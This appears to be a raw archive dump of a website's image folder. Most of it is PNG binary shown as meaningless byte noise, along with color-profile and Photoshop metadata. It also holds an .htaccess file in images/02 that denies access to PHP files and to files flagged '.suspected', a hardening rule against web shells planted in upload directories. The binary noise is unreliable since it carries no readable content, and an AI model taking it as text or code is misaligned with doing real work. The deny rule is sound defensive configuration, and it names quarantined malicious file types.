&5��InLΩC���Y�R�2��v�eے��-�jU�U�$�D]���!{��q�1�,;�*U�D�CRpta�{v�(�T���t9v��dhz�;+��pvX<�b�o�_
�m����֨�%j���)%��5m��o�
�>�["�q�����k5�F���ؘFf!�*�P��E��fF4ȿ1�&�O�;�*���9��v0�֡����;;?�{��(ƹ�?Ϳ�W9^-��lj�^`|�)k�]*s��vx��˦i�6مK�Q<|�6�'ҳ�J�Õ����~3�Aq7�1�����KzTߕ���8i"R�%��J<��Yo�k���L�ɮ�@Xb�I���d����$� �7h�tp��>��p�4���	G�}Q�c�|�Q��L{Gǹ��p���n�y��*=tc�}ؕl���9�shp@��^d!�d9���e���k���*b`�1�f
�Y��f��/���
�H��m�k9�8FV�]�jM�Bl�UE�1aK����0�X"��@���f�e���4���ܺ2��-��S~Ԣ�Ow��
M��"
w=��K�1���"��k�.�<�,�B���)�h��S����q�V��3�`��:��rԊ�um۹Jr�V�:ݝ?�,g��t_�Op,�z���V��uǜ﩮j�(����?�_�#��0�A��A\o���f#�4�̀^t]�.�0�gAl��C$.�u�,U���tTW"���,Y�I覷.�wb�tЃ�1��h�
�@q��%lqd��n-5lR�Ud��c�j�)c���H��Q��tg�?7�'��S��d�X\���|���[q�h_v��:�#����rE;�c���e5��+��㼔�$�q���xɳ����~%a�:�[Ŕ8����;X�K�Zɫ콓�Q�_��J�UC(���>�f������d�]����Nl�;��>��^�j���αnb�3�#��J�M9���oH��3�k=�%����H����u8L�g@�ɐqJ��M*�Z�r�HR7�V�,.s����Y3a$�!e@�D�`\l�XD+�H��3pX��%�)`�.Ww�`U��)�Gxc?��vY���h���߅z��(�p��
��͔v������1n�1���D��w�z���B��P!��KvC�_�'0f�On*gd:ܡ�5�03�٠+x[�@4՟zP��"EK�i0M����D��K30���Z� uIKv�C��Lj���;"%Q�)e����m����9��	�l�{Q�k�-�;��b3~�@@�t����z�B9�Qp��3�դ��$�TI���������WvK���v��rR�]o��f�֔�0-�{EL�X���B��ݞ��!-��Lcӡ��R�$��V���ߠ�smG`G($D2T�5D��ެ}^���h�T����Z�ț�
">ۼ���FՄ�=�IMo�"�M����8^�r���ˇ8��}�����6u��3�Jٝ�ݭDQ�iJԜ?<�\]	��瀣�b7ؼ�Կ�ԫ^�!E��Y7��j�97I�t?�ݪ��x�\��/T	�Mc�[�Ep|vg��/�0-�'�)�G��L;W�Ȟ
�/�8�2�aGm]��r/	�M����g^�>�������E>�/t�O�f�~���*?��hf�:~.�I��+���~�o��%-�U��.���,��EP+v��(%�P	56q�z�s�Ȕr+�.׹������XXJ�}��-lє3�C��*�_���g�g���`w�-ٻy������k�c��;��Q�)��qy+	U�9��^����� $�tۀ:]�Ъ��Cݨ�um��Z�t��`�.1q��
�T�m�LLV��F]2Y�'HG�fTZ5ij�zsV���2L9�m����fbMB:���X�!���	4�yh������[s��*�uUX�n��%,��|l������K�Ŗ���K"��Y�!a8�$��O�@rd�*�<�g������2h�|$~V����
Y�<-�y�Y6ɉJ�r�ZB��F�.���?��d"�w?~(ø֋D�ؤkv0�$�����mr�}�� 3���LZe�r�x���co���Gp<���d��t�0��L�3w��4�9��\���ft��F�� �e�mWf���4�eFׯ+��pT:����dev�+�p�W�
��H��l
Wz����!��8�ekZ��1Od�����Jq�X�&-u�d�r1z��S%�M�˛L1�oʜ:�i�A�`��̶� ��e4�������jYg�.Y�pvt�U�_�A�x���y�G@D=��>X�~�_g���
u�ζX�K��vyL�T�<V;��Lh�)ˌ�>.�X���E����0�8:���p��2f�g
z(��~�m{d0G��̃y@�EZ���%�Z�+��^|w��$�:�k�11���L�F��)m[e�~E��b�L��Tzܢ� �a�w�$�E�F�.	�����5�D�%Ȧ��Wj��p' 8M�,u$ל�D���.��!�N�i�SD��: ly~��bp�_���M���p8�����o��_�����v��"�$�b�$����@���5[�ٞH��m)@ݶ��H�r�)}��F��s'?�7�C����'tCu��s\�eF�;��@��>�3�_x�R��> ]⛥N��UP�T ŵjnO�*_��v+P��~}�[�2j�q��mH�a��Fk�F�s�g�n���V�ha����\��w=�kt�,��PF,�@��f�2hm& 08"IGZ�S���#G(�jIW�4�*�ЉET&
�7�l�@�Cf%�,�jS�lJ)c����%VŚn9�-��,肥_d��a
��(�.o�˰�\p��E���_���N�Ad#1�)9����L�.D�V�.'���)�%	LMw����b��eMl�z��9�`/͂�i���Ug�WL,3�3<�
�Cv4=��p�F���q�ք;a��u^����[j
���E���Y�~�סAgO�j˸R"tlg�Y��E!1����s�˜EIT��8�S����5Quť�R�}��LقR	��͎�����@�
��ݻX��Րrz]T��1�����"�D)��=qQ#<Ζ�ۻ7����%�R'���j%�UG�2t�g{O��+��O�	0RR�>(	�#�MF4��pj�Mr$R�n|�7��6���B�w%�ޓ���Ug�Z7Z�QK�à��tv���7�}E�2����u7^l\��K=.��`�SV�i:%'������|w��vP�p�D6���0"EX�Sٴ��K�5���[��5^l
�7U<��\�����W9��-}[�ti_c!�u�jbE�|Wڿ�?�[�O�/�[޲�3pK��MA!@�"T���������G��2��!
]�hb�w0{��٭�mJѪ��io�Ar�u�i9hFl�|�����
�0���J%-�e�e�NŽdN���%���睪��Z�0��P��
M���\h�(��C�����������O�z��8��,�::�]0�e�U�5�Kgw�����8�^u�	�R�I+J]����~���.���Pi�f� `m�m-dyQ|�����*��[�1+�)la�4)���/����
�r��Y�qB0�M�mI��R���;�i�Y��Cr��<�B���X2R^�p�F�0gRi����R��m�(��n�e<�ڌq��k�_D��P3<��< �������C)b8���~�m>���"U5gh+#�0����JG�g4��(��χ-e���C�AW���Q<8�	�(���5uFcJ���N����=�����r��>��9��2�xCA�$ZӒ-�M��Q�Fs��GCa��לi��3i��:��
�9��0�.?��V�º\���84-�d�Y�[��Ϛs�%���L�
������)�'絫sg�(T����S�v�M�m%+��[T��Ԉh�N<XtpV(n+?1����V�\����rW��y�����独C=7{�Y��i�a4����І�L�(U�x˅��B5�/V�U!�ӶM�\>�#}��#@�E�K7�!}�J��C����
��.�p]pA�v|7*�A;t����~:+����*��%[dS���kD#
-��D��9��p�1�TV2���z��@F���"b�jc%��	�|��M�֗��2Y�y���62�%��yG=�1*.�.3�0���>/��\�q���o�p��f9din��m)���!E�%��9�>yp�J!bՎ~5u�UV����2��|��VWh���D�"�s��
�؇h���񓖞~VYT���|�F��׎�k��hc*Sk]DS'��H[���y.��l�����r�g����-�Ӏ�l�j׫�\��"�E�����G5E�Ҭ��C̊g��=UHrM
�0L��M��\߻
�sMD��4�1��R�6yP7m��&h,w-�
-�4��Ⱥ��L�?�~�;������;ƙDS�.��b��=�Gu�{��D�)�����VGw���w�;W��,�p����yY(���pwu���;P�q��=��3�}(Ѱ^E�QA�j2V	׶Huk��|E+���1�;�p�������t�D��ס��D(�ȶ�nH��Cs��8�v��A�\P����8�85D.�ς`r,&�xvWn���`1��[�<�Ot)&I�ͽ���1�,�E*��%��go&"	�D����M-����%p��o\��hL�K.@�[�CL���KbeJ@����@�L�BU}P&(p?�C���$�`��M��E9��
�
�PRQ��|��<�0i�u���0PQ�Pʍ*m;�_0R��C,�<�[�ݞlS�jn��bTo�"���T2��T[BW��y�rT�Y�;ʩY��
��"���#�*t��t}���3�J���_�bg��֘Br1�g�#G
g^�1y�ձ��>�n�:v�8Lzp�!�d��X�̪�pL�U
�n�Mq�C:�@^;�
MeOL<Dx��/�x�I�Ve�cr1���|nz�^dw��"S/\�<��mWuJ`_+X㮟��?��`
���hw�2�P�>J�j�B%�(/5#]��%��9��>?��ך�_��'���s���b�z��Є��du�Kv�q�	�).�k��5l�*#�\g�'�op@�*G����r��S�s�qY?���l�;����Bnj0�_�B(s�v�Խm���@��֡��V!�K���8�zq�9U`�T��5��5Ap�]sa������q�G�=G�I���O�^�T}��j�0�.)y�n0q`�C��IҜ9K���tvq���9~۔oMM"�$x�*[3�$|��>-�|�1o�/0ˣ�����

��n,�_�~ၼ~v��/}
ΐ�ئM���	'^\`�4�g�.��|�-�P��'[6�r�%�JH!ֲ��r>T�)}���*'$�aN�[_�%����I��i�f�G��4�0��Ŭ��v?ES���2Θ"�Du.R�������]'}�/��b�6���}�XD��j�qp�6���v�^QD�����ϔ�&�
�I��YXџm��
���H���O�X�7k�O�9Ҍ�
n�66n���	��;�o<tK�Ȝ���Df��W�7l�v�U`c�r�)�<���'5��<����Ilej�L���T�Bu㔹%W���/�M��)�b3�w��NK=�ݢ��H��c̴��w2�`9x�s�}�Қr)�qe
@�x�+�I�s�=�r�*ݹʭ�RS�P%l��Xσ�3Ѻ��
Bb៷�	<�t�V�rv��2����Y
��B�i�`F>�x-��C5�e�����2T�ٽm����2�d�c�6�X�+�\�*�,���? �E��|{D��ɲ7�7�xF]#�C�z���5�"D�(J
;Ӣ�K�R�;�SK��<
�����d���EV_xz�at����,�1�d�o2���ّƇ���5"��
���3��T�5��k�r�8k�H16i���|�H����R��;�UA��4WJ/gl�#��v��[1^؏�j��T�!ۃ�����m�@�Lca�OHA�g�o϶Ҟ)\"Aw������q,H&�r�=I�[u��p�v��5�$:��f
�o�C�A���\ux��uT��X���w�cN;O����n�}[%c3m,Hs���
�Vx13	f�_�oI�;���@��O�5�Ja�a&#rY��0=��A��j�Z����qU�CyYՄ�ء2�x���_m#}�i���Ydz����9 A���g�|��6}���l�l+�K;GX��pX��W66\�N�*�St���,��ʕl��p�3O�NE�ڄ��[h뺄]��fe�����g�	#rT0�D޶��оQg�.�֪b��8z�l��!G��5��S$=��{K��>
8Hmr�D.���ɝ=�!td�9��0#�-^fp�*��yJ@[����_Tk�7���c��1�W�Ţ�h'Φ�#��G�+�L�����b���bM�]W�9Uw_�m]v���
��"S��
}]��ut���ǀC]�^�9!1So��l�"��`�fMC2q�A1��H�9d��?ch�#�D堷�I$��7p~$��R,����T(��^���Ȳ�MT��Ѧb=׮�	�h2ިĨ&8M1ʉ�@D>k����uXaSY^�?�_tQ�b�X��IEND�B`�images/02/.htaccess000044400000000424152434416630010036 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/button1_2.png000060400000005312152434416630010341 0ustar00�PNG


IHDR�t�
7iCCPsRGB IEC61966-2.1x���wTS��Ͻ7�P����khRH
�H�.*1	J��"6DTpDQ��2(�C��"��Q��D�qp�Id�߼y�͛��~k����g�}ֺ����LX	��X��ň��g`�l�p��B�F�|،l���� ��*�?������Y"1P�����\�8=W�%�Oɘ�4M�0J�"Y�2V�s�,[|��e9�2�<�s��e���'�9���`���2�&c�tI�@�o�|N6(��.�sSdl-c�(2�-�y�H�_��/X������Z.$��&\S�������M���07�#�1ؙY�rf�Yym�";�8980m-m�(�]����v�^��D��W~�
��e���mi]�P����`/���u}q�|^R��,g+���\K�k)/��C_|�R����ax�8�t1C^7nfz�D����p�柇��u�$��/�ED˦L L��[���B�@������ٹ���ЖX�!@~(* 	{d+��}�G�͋љ���ς�}W�L��$�cGD2�Q��Z4 E@�@������A(�q`1��D ������`'�u�4�6pt�c�48.��`�R0��)�
�@���R�t C���X��CP�%CBH@�R����f�[�(t�
C��Qh�z#0	��Z�l�`O8�����28.����p|�O�X
?���:��0�FB�x$	!���i@ڐ���H���[EE1PL���⢖�V�6��QP��>�U�(j
�MFk�����t,:��.FW������8���c�1�L&���ӎ9�ƌa��X�:��
�r�bl1�
{{{;�}�#�tp�8_\<N�+�U�Zp'pWp���������e�F|~?��!(�	��HB*a-���F8K�KxA$��N�p����XI<D<O%�%QHf$6)�$!m!�'�"�"� ��Fdr<YL�Bn&�!�'�Q�*X*(�V+�(t*\Qx��W4T�T\���X�xDqH�^�H���QZ�T�tT�Ҵ2U�F9T9Cy�r���G,ň�C�Q�(�(g(cT��OeS��u�F�Y�8
C3��Ri��oh��)���J�J�J��q)�����2�a�u�;U-UOU��&�6�+����y���J���F�ީ3�}��Է�w���@i�i�k�j��8��tm��9���ք5�4#4Wh��М������Ҫ�:��T�����C����U�MG��C��c�
Ó�Ψd�1�t5u�u%�����3z�zQz�z�z��	�,�$����S:!��
�,��]�������b�6u=2V30�7n5�kB6q7Yf�`r�c�2M3�mz�6�7K1�12����͇-�NB��Lӓ��le�Z�-�--�,�YX�[m��hmo�n�h}džbhSh�c󫭙-׶��\�\߹��v�}ngnǷ�cwӞjb��������ȡ�a��1ѱ����
cmf�wB;y9�v:����Y�|��K�K�ˣy���獹�r\�]�n�D��nRw]w�{��}�G�DŽ��g��A�g^�^"���lg�J�)o��ϻ�{Ї��S�s�W�7ٷ�w���o��)���6�Z܀怩@���}A��A�A�͂E�=!pH`����
��w��Ѐ��ŒÖ�}�	�	aQѿ��`ɂ��"�"�"�D�DI�z�����_�xǔ�Hc�bW�^�ӈ�u�c����,ܹp<�>�8�"�Ey�.,�X�����%�%Gщ1�-��9����Ҁ��K��l�.��oo���/�O$�&�'=JvMޞ<��R��T�T����֥�NM۟�)=&�=���qTH�	�2�3�2��̳���˜��\6%
5eCً���4��Ԁ�D�^2��S��&7:�H�r�0o`���M�'�}�^�Z�]�[�[��`t���UЪ��zW�.Z=��ó���ik(�.,/|�.f]O�Vњ���~�[��E�76�l�ۈ�(�8�iMKx%K�K+J�o�n����W�_}ڒ�e�̡l�V�V����ܷ(W.�/���scGɎ�;��PaWQ���K�KZ\�]eP���}uJ�H�WM{�f��׻y������V�UWZ�n�`��z������}�}9�6F7����I�����~�~遈}͎��-�-e�p��u�`���x���l�o����$�����A�{����}g�]m����\�9Օ�%��>x��ǥ��{���=Vs\�x�	‰��N柜>�u�����c�Kz=s�/�o�l����|ϝ��?y�����^d]��p�s�~���:;���/;]��7|���W����p������Q�o�H�!�ɻ��V���sn��Ys}��ҽ����~4��]� =>�=:�`��;cܱ'?e��~��!�ań�D�#�G�&}'/?^�x�I֓���?+�\����w�x�20;5�\�ӯ�_�����e�t��W�f^��Qs�-�m���w3���+?�~���O�~���pf*	pHYs��~�9IDATx�c��🅙�����������
�,l�P`���2��
U�U/B���
��N�9,IEND�B`�images/refresh.png000060400000007107152434416630010166 0ustar00�PNG


IHDR''��Q5
7iCCPsRGB IEC61966-2.1x���wTS��Ͻ7�P����khRH
�H�.*1	J��"6DTpDQ��2(�C��"��Q��D�qp�Id�߼y�͛��~k����g�}ֺ����LX	��X��ň��g`�l�p��B�F�|،l���� ��*�?������Y"1P�����\�8=W�%�Oɘ�4M�0J�"Y�2V�s�,[|��e9�2�<�s��e���'�9���`���2�&c�tI�@�o�|N6(��.�sSdl-c�(2�-�y�H�_��/X������Z.$��&\S�������M���07�#�1ؙY�rf�Yym�";�8980m-m�(�]����v�^��D��W~�
��e���mi]�P����`/���u}q�|^R��,g+���\K�k)/��C_|�R����ax�8�t1C^7nfz�D����p�柇��u�$��/�ED˦L L��[���B�@������ٹ���ЖX�!@~(* 	{d+��}�G�͋љ���ς�}W�L��$�cGD2�Q��Z4 E@�@������A(�q`1��D ������`'�u�4�6pt�c�48.��`�R0��)�
�@���R�t C���X��CP�%CBH@�R����f�[�(t�
C��Qh�z#0	��Z�l�`O8�����28.����p|�O�X
?���:��0�FB�x$	!���i@ڐ���H���[EE1PL���⢖�V�6��QP��>�U�(j
�MFk�����t,:��.FW������8���c�1�L&���ӎ9�ƌa��X�:��
�r�bl1�
{{{;�}�#�tp�8_\<N�+�U�Zp'pWp���������e�F|~?��!(�	��HB*a-���F8K�KxA$��N�p����XI<D<O%�%QHf$6)�$!m!�'�"�"� ��Fdr<YL�Bn&�!�'�Q�*X*(�V+�(t*\Qx��W4T�T\���X�xDqH�^�H���QZ�T�tT�Ҵ2U�F9T9Cy�r���G,ň�C�Q�(�(g(cT��OeS��u�F�Y�8
C3��Ri��oh��)���J�J�J��q)�����2�a�u�;U-UOU��&�6�+����y���J���F�ީ3�}��Է�w���@i�i�k�j��8��tm��9���ք5�4#4Wh��М������Ҫ�:��T�����C����U�MG��C��c�
Ó�Ψd�1�t5u�u%�����3z�zQz�z�z��	�,�$����S:!��
�,��]�������b�6u=2V30�7n5�kB6q7Yf�`r�c�2M3�mz�6�7K1�12����͇-�NB��Lӓ��le�Z�-�--�,�YX�[m��hmo�n�h}džbhSh�c󫭙-׶��\�\߹��v�}ngnǷ�cwӞjb��������ȡ�a��1ѱ����
cmf�wB;y9�v:����Y�|��K�K�ˣy���獹�r\�]�n�D��nRw]w�{��}�G�DŽ��g��A�g^�^"���lg�J�)o��ϻ�{Ї��S�s�W�7ٷ�w���o��)���6�Z܀怩@���}A��A�A�͂E�=!pH`����
��w��Ѐ��ŒÖ�}�	�	aQѿ��`ɂ��"�"�"�D�DI�z�����_�xǔ�Hc�bW�^�ӈ�u�c����,ܹp<�>�8�"�Ey�.,�X�����%�%Gщ1�-��9����Ҁ��K��l�.��oo���/�O$�&�'=JvMޞ<��R��T�T����֥�NM۟�)=&�=���qTH�	�2�3�2��̳���˜��\6%
5eCً���4��Ԁ�D�^2��S��&7:�H�r�0o`���M�'�}�^�Z�]�[�[��`t���UЪ��zW�.Z=��ó���ik(�.,/|�.f]O�Vњ���~�[��E�76�l�ۈ�(�8�iMKx%K�K+J�o�n����W�_}ڒ�e�̡l�V�V����ܷ(W.�/���scGɎ�;��PaWQ���K�KZ\�]eP���}uJ�H�WM{�f��׻y������V�UWZ�n�`��z������}�}9�6F7����I�����~�~遈}͎��-�-e�p��u�`���x���l�o����$�����A�{����}g�]m����\�9Օ�%��>x��ǥ��{���=Vs\�x�	‰��N柜>�u�����c�Kz=s�/�o�l����|ϝ��?y�����^d]��p�s�~���:;���/;]��7|���W����p������Q�o�H�!�ɻ��V���sn��Ys}��ҽ����~4��]� =>�=:�`��;cܱ'?e��~��!�ań�D�#�G�&}'/?^�x�I֓���?+�\����w�x�20;5�\�ӯ�_�����e�t��W�f^��Qs�-�m���w3���+?�~���O�~���pf*	pHYs.#.#x�?v�IDATx��GhQ��K1vcbon$\h@T](�Q�QQ�-D7TPpaCDP[,�`�¾���5&jb��s�w�xw�̼�d�ɝ��~�e���JS����f���,5ґ���`8�
@.�/�i�1亃�`:�e�Y�o�q��jh��`	X:%�$�u�@�
��c�#Af��O�̶�%�0�]�N0,6�՛\p���Հg`8
����[Ƃm�����l�"S����-	b��fp@ܭp�HO{Ags|�)ϭ��`�U�����r斀����k�#�j:r\��lS�f����w��
�`�FET��`�U�n������8d�
�ɨrsDk�`�k*#�1�e��ho���(��F[�G�nb�/�:�m���(r�3�i�yq͒�+���}��$d�}��ƌTq,G~rkA(�K�QÐ�k�q�p]�'7t��ο�A�@�{�o�`~r.1�~�
!������%�����0�}�p�U��\G�c��C4
9`�hb�`�qv~�F�{�����O�2���v�3�ȍ�H֋.���y��m�&�EgkZr|�)0Q�kxF�l�{>/*�����U-ڽOS��%��z��0�0����������|_�0M4Ej!��Yc*V�J�O��V�&��s���1�g����ݖ*(>C4m
��K���nYǘ�3��w[�I(��>r\h��3/�D*��{��q�5�v�~�5�J<!�vv7�B�W��Щ�K�/�:�.�9~Qq�b�2�c��9J����~����9�(Ɓ�e��(�n�32,��*�P̢�9��+��c,��~/d�v0�<^i�dH]1�`���wM#W��dR|)[&���;�d�n���d�P�P���l��A��U�{Bɹ�%�xM��me�xwW7�\�Rg4��B� 3���IEND�B`�images/page_up_hover.png000060400000003127152434416630011351 0ustar00�PNG


IHDR���tEXtSoftwareAdobe ImageReadyq�e<JiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:96184EFA8F7C11E5A80FEB2533152298" xmpMM:InstanceID="xmp.iid:96184EF98F7C11E5A80FEB2533152298" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="adobe:docid:photoshop:1e0e82ca-8f7c-11e5-94a6-ee3452282a2a" stRef:documentID="adobe:docid:photoshop:1e0e82ca-8f7c-11e5-94a6-ee3452282a2a"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
3|�IDATx�bܸ8����GH�߿�,@'�
'�"@1��r	h�Xlܒ���� ������P�����? Ӿ}�$?�����dB#01`��yi�4U�>�~z}��Z,�
2^L1� ���P�W��"�@Xl�e!����--��E������?���###��?_Qqh�01��~|y����')���`�,E�?���3Љ@6PD��LL@@v8��b`���;>~���gĥ�[^����[�6��D�`dd�3ף+Yم�<����G�o�*�|����~3�T��D�È���ā��?�:����� !
46`�Cؼ"�@hݷ����T��R0�Q=񟙕a���@�Z�g�a �;�������Z{�	|��G_̻W�ƒg��݃�k�P�U����E�%�BK����7�l�������sϚ��6_S�?�c ��C�^��yvb˥�Z�^Nj`���E&�8,�����lr����g_�y�R6�F�-"�7�P�8
�2Mm����aXQ��/3��/b�F2�l��Y�UPpdn��$� ��e����e߹@؄��xҫ����i�&AP��w%)
\R�#���K�n�xUe���ϧ��9���׉R��O��|H�Y���k���IEND�B`�images/show-filter-button.png000060400000043426152434416630012310 0ustar00�PNG


IHDR
R|��	pHYs��
OiCCPPhotoshop ICC profilexڝSgTS�=���BK���KoR RB���&*!	J�!��Q�EEȠ�����Q,�
��!��������{�kּ�����>�����H3Q5��B������.@�
$p�d!s�#�~<<+"��x��M��0���B�\���t�8K�@z�B�@F���&S�`�cb�P-`'������{[�!�� e�Dh;��V�EX0fK�9�-0IWfH�����0Q��){`�##x��F�W<�+��*x��<�$9E�[-qWW.(�I+6aa�@.�y�2�4�������x����6��_-��"bb��ϫp@�t~�,/��;�m��%�h^�u��f�@����W�p�~<<E���������J�B[a�W}�g�_�W�l�~<�����$�2]�G�����L�ϒ	�b��G�����"�Ib�X*�Qq�D���2�"�B�)�%�d��,�>�5�j>{�-�]c�K'Xt���o��(�h���w��?�G�%�fI�q^D$.Tʳ?�D��*�A�,����`6�B$��BB
d�r`)��B(�Ͱ*`/�@4�Qh��p.�U�=p�a��(��	A�a!ڈb�X#����!�H�$ ɈQ"K�5H1R�T UH�=r9�\F��;�2����G1���Q=��C��7�F��dt1�����r�=�6��Ыhڏ>C�0��3�l0.��B�8,	�c˱"����V����cϱw�E�	6wB aAHXLXN�H� $4�	7	�Q�'"��K�&���b21�XH,#��/{�C�7$�C2'��I��T��F�nR#�,��4H#���dk�9�, +ȅ����3��!�[
�b@q��S�(R�jJ��4�e�2AU��Rݨ�T5�ZB���R�Q��4u�9̓IK�����hh�i��t�ݕN��W���G���w
��Ljg(�gw��L�Ӌ�T071���oUX*�*|��
�J�&�*/T����ުU�U�T��^S}�FU3S�	Ԗ�U��P�SSg�;���g�oT?�~Y��Y�L�OC�Q��_�� c�x,!k
��u�5�&���|v*�����=���9C3J3W�R�f?�q��tN	�(���~���)�)�4L�1e\k����X�H�Q�G�6����E�Y��A�J'\'Gg����S�Sݧ
�M=:��.�k���Dw�n��^��Lo��y��}/�T�m���GX�$��<�5qo</���QC]�@C�a�a�ᄑ��<��F�F�i�\�$�m�mƣ&&!&KM�M�RM��)�;L;L���͢�֙5�=1�2��כ߷`ZxZ,����eI��Z�Yn�Z9Y�XUZ]�F���%ֻ�����N�N���gð�ɶ�����ۮ�m�}agbg�Ů��}�}��=
���Z~s�r:V:ޚΜ�?}���/gX���3��)�i�S��Ggg�s�󈋉K��.�>.���Ƚ�Jt�q]�z�������ۯ�6�i�ܟ�4�)�Y3s���C�Q��?��0k߬~OCO�g��#/c/�W�װ��w��a�>�>r��>�<7�2�Y_�7��ȷ�O�o�_��C#�d�z����%g��A�[��z|!��?:�e����A���AA�����!h�쐭!��Α�i�P~���a�a��~'���W�?�p�X�1�5w��Cs�D�D�Dޛg1O9�-J5*>�.j<�7�4�?�.fY��X�XIlK9.*�6nl�������{�/�]py�����.,:�@L�N8��A*��%�w%�
y��g"/�6ш�C\*N�H*Mz�쑼5y$�3�,幄'���L
Lݛ:��v m2=:�1����qB�!M��g�g�fvˬe����n��/��k���Y-
�B��TZ(�*�geWf�͉�9���+��̳�ې7����ᒶ��KW-X潬j9�<qy�
�+�V�<���*m�O��W��~�&zMk�^�ʂ��k�U
�}����]OX/Yߵa���>������(�x��oʿ�ܔ���Ĺd�f�f���-�[����n
�ڴ
�V��E�/��(ۻ��C���<��e����;?T�T�T�T6��ݵa�n��{��4���[���>ɾ�UUM�f�e�I���?�����m]�Nmq����#�׹���=TR��+�G�����w-
6
U����#pDy��	�
:�v�{���vg/jB��F�S��[b[�O�>����z�G��4<YyJ�T�i��ӓg�ό���}~.��`ۢ�{�c��jo�t��E���;�;�\�t���W�W��:_m�t�<���Oǻ�����\k��z��{f���7���y���՞9=ݽ�zo�����~r'��˻�w'O�_�@�A�C݇�?[�����j�w����G�������C���ˆ
��8>99�?r��C�d�&����ˮ/~�����јѡ�򗓿m|�����������x31^�V��w�w��O�| (�h���SЧ�������c3-�;)iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:xmp="http://ns.adobe.com/xap/1.0/"
            xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
            xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
            xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
            xmlns:exif="http://ns.adobe.com/exif/1.0/">
         <xmp:CreatorTool>Adobe Photoshop CC (Windows)</xmp:CreatorTool>
         <xmp:CreateDate>2015-10-29T16:51:16+04:00</xmp:CreateDate>
         <xmp:MetadataDate>2015-10-29T16:51:16+04:00</xmp:MetadataDate>
         <xmp:ModifyDate>2015-10-29T16:51:16+04:00</xmp:ModifyDate>
         <xmpMM:InstanceID>xmp.iid:32369666-1d63-4f4f-8a6f-c6c952699a90</xmpMM:InstanceID>
         <xmpMM:DocumentID>xmp.did:fccfa9fb-ef16-b941-be76-a343e905e965</xmpMM:DocumentID>
         <xmpMM:OriginalDocumentID>xmp.did:fccfa9fb-ef16-b941-be76-a343e905e965</xmpMM:OriginalDocumentID>
         <xmpMM:History>
            <rdf:Seq>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>created</stEvt:action>
                  <stEvt:instanceID>xmp.iid:fccfa9fb-ef16-b941-be76-a343e905e965</stEvt:instanceID>
                  <stEvt:when>2015-10-29T16:51:16+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC (Windows)</stEvt:softwareAgent>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:32369666-1d63-4f4f-8a6f-c6c952699a90</stEvt:instanceID>
                  <stEvt:when>2015-10-29T16:51:16+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
            </rdf:Seq>
         </xmpMM:History>
         <photoshop:DocumentAncestors>
            <rdf:Bag>
               <rdf:li>xmp.did:a90cf047-46c2-5546-8ed8-f87da2ba1ed7</rdf:li>
               <rdf:li>xmp.did:dff48177-d54a-c940-b0aa-b14a15d86194</rdf:li>
            </rdf:Bag>
         </photoshop:DocumentAncestors>
         <photoshop:ColorMode>3</photoshop:ColorMode>
         <photoshop:ICCProfile>sRGB IEC61966-2.1</photoshop:ICCProfile>
         <dc:format>image/png</dc:format>
         <tiff:Orientation>1</tiff:Orientation>
         <tiff:XResolution>720000/10000</tiff:XResolution>
         <tiff:YResolution>720000/10000</tiff:YResolution>
         <tiff:ResolutionUnit>2</tiff:ResolutionUnit>
         <exif:ColorSpace>1</exif:ColorSpace>
         <exif:PixelXDimension>17</exif:PixelXDimension>
         <exif:PixelYDimension>10</exif:PixelYDimension>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
